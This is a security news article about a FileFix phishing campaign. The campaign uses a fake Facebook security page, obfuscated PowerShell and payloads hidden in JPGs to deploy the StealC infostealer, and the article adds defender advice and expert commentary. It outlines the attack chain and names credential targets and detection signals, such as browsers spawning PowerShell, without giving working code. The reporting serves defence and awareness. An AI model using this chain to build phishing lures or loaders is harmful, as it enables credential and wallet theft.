Acronis’ Threat Research Unit has found something new and worrying: a FileFix campaign operating in the wild that does not stick to the original proof of concept. It is clever, quiet, and it hides its work inside pictures.
The short version: attackers moved FileFix from lab note to live attack. They layered obfuscation, multilingual phishing, and steganography to keep one step ahead of defenders. The endgame is an infostealer called StealC. The path there is long and purpose-built.
What the bad actors do, in plain terms, is ask the victim to do the work. That is the essence of these attacks. ClickFix asks people to paste a command into a Run window or terminal. FileFix asks them to paste into a file upload address bar instead. Both ask for trust and a keystroke. Both rely on a human being willing to follow instructions.
Fake Facebook Security Page
This campaign used a convincing fake Facebook security page. The text said an account would be suspended. The button promised an incident report. The bait was realistic. The pressure was real. The victim clicks. They paste what looks like a file path and then nothing seems to work. The page blocks progress. The user sees an error. The machine, quietly, is not idle.
Under the hood the attack is multistage. The first-stage PowerShell snippet is long and heavily broken up into variables and fragments so pattern-based defenses struggle to see the threat. The snippet fetches a JPG from a public host. The image looks innocent. It does not raise alarms. But inside its bytes there lives a second-stage PowerShell script and encrypted executable payloads. The second stage extracts, decrypts and decompresses those files. Then a Go-based loader runs checks, decrypts shellcode and unpacks StealC in memory.
Steganography is the clever bit. The attackers embed both scripts and encrypted binaries into ordinary-looking images. The images are often AI-like pastoral scenes. That choice is odd and effective. Security teams do not usually treat a downloaded JPG as suspicious. The image acts as a carrier and a decoy. It buys time and obscures the payload.
Obfuscation is Everywhere
Obfuscation is everywhere. JavaScript on the phishing site is minified from roughly 18,000 lines down to a dozen. Function and variable names are meaningless strings. Code is split and scattered. Some variants encrypt the download URL with XOR and hide it as hex. The payloads evolved in two weeks. Earlier attacks used single-stage scripts or different obfuscators. Later ones moved payload hosting to Bitbucket to blend in and reduce the need for attacker-owned domains.
The final payload is a loader written in Go. It runs basic virtual machine checks and decrypts API names at runtime. Then it loads shellcode and runs StealC. The infostealer looks for browsers, crypto wallets, messaging apps and cloud credentials. Its list is long: Chrome, Firefox, Opera, Tencent browsers, a long roll of wallets and tools, and keys for services like AWS and Azure. StealC can also fetch and run additional modules.
This campaign is not a one-country affair. VirusTotal submissions linked to the infrastructure come from many places. The phishing site supports at least 16 languages. The C2 we observed is registered in Germany but that says little about the operators. The tradecraft and the rapid iteration suggest a group that tests and refines its tools.
Why this matters now. *Fix attacks have gone from curiosity to utility. ClickFix already made the jump. FileFix appears to be following fast. FileFix can be more persuasive than ClickFix because most users have used file upload windows. Few have ever used a terminal. That makes the social engineering simpler and, in some environments, more likely to succeed.
Practical Steps for Defenders
Defenders can act. First, educate users. Teach them that no legitimate site will ask them to paste anything into system dialogs or file upload bars. Make clipboard hygiene part of phishing training. Train users to question any website that asks them to run or paste system commands. Second, harden execution paths. Block PowerShell, CMD, MSIEXEC and MSHTA processes spawned as children of web browsers where possible. That control should not break normal business workflows and will stop this attack chain before code runs.
There are additional options worth considering. Flag or quarantine images downloaded via PowerShell commands. Alert on web browsers spawning unexpected child processes. Watch for unusually long or fragmented PowerShell commands that piece together class and namespace names as variables. Those signs are noisy but useful.
FileFix has moved past proof of concept. It now hides code in pictures and rides in plain sight. Expect more variants. Expect the techniques to mutate. Watch for images that are more than they seem. And teach users not to paste trust into a browser window.
Innovating Faster Than We Can Respond
Louis Eichenbaum, Federal CTO at ColorTokens says cyberattacks are becoming more sophisticated every day. “It’s no longer realistic to believe we can prevent every breach. Our adversaries are innovating faster than we can respond, and despite all the end-user training we provide, it only takes one careless click for an attacker to gain a foothold inside a network.
“This is why it’s more important than ever for cybersecurity professionals to embrace Zero Trust. The core principle of Zero Trust is simple: assume the adversary will breach your network. The question then becomes what happens next?”
Eichenbaum says it starts with identifying your organization’s most critical assets. “From there, you design a microsegmentation strategy by placing security controls as close to those assets as possible. That way, even if a user device is compromised, the attacker cannot move laterally across the network to reach high-value targets.”
Zero Trust doesn’t stop every attack, he explains, but it reduces the blast radius of a breach and builds resilience directly into the network. “For years, cybersecurity strategies have focused almost exclusively on prevention. Prevention is still important, but we must acknowledge that breaches are inevitable. Our job now is to combine prevention with resilience by accepting that intrusions will happen and ensuring they cannot spread unchecked.”
Zero Trust is how we achieve that resilience, Eichenbaum adds.
Modernizing Human-in-the-Loop Tradecraft
Jason Soroko, Senior Fellow at Sectigo believes this campaign matters because it modernizes human-in-the-loop tradecraft and takes advantage of user trust in familiar workflows and brands. “This includes real-looking Facebook Security pages and reputable code hosting. By hiding payloads inside images fetched from Bitbucket and triggering local execution through File Explorer, it slips past filters that expect obvious downloads or Run dialog abuse and it causes a condition for session cookie theft that can bypass MFA.”
Soroko says entities should update awareness content to flag any site that instructs users to paste strings into the File Explorer address bar and any upload flow that deviates from normal choose file behavior.
“Security teams should harden endpoints with application control for script interpreters and common living off the land tools, block or alert when browsers or explorer spawn cmd or powershell, restrict outbound access to developer platforms on non-developer machines, and watch for image downloads followed by process creation or archive writes. Add detections for explorer launching network-aware tools, monitor for unusual Bitbucket traffic, and tune EDR to catch steganography-style unpacking patterns. Use tighter session defenses using short-lived tokens, reauthentication on sensitive actions, and stronger forms of authentication to blunt the value of stolen cookies.
A Social Engineering Pattern
FileFix is a social engineering pattern that updates the older ClickFix trick, Soroko continues. “Instead of telling a victim to open the Windows Run box and paste a command during a fake verification step, the page walks them into a file upload flow, gets them into the system file picker and then convinces the victim to paste a provided string into the File Explorer address bar. Windows treats this as a command that runs locally without a download prompt. The initial script then retrieves images that conceal code, reconstructs the loader, and deploys the StealC infostealer.”
He says StealC is a widely traded commodity stealer that has appeared within the last few years and is rented to affiliates, harvesting browser passwords, cookies, autofill data, crypto wallets, and messaging tokens while using frequent updates and anti-analysis checks. “Its low barrier to entry and steady development cadence make it a favorite for adversaries that prefer social engineering and trusted services over exploits, which means the best counter is a blend of user awareness for abnormal flows, strict process, and egress controls.”
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.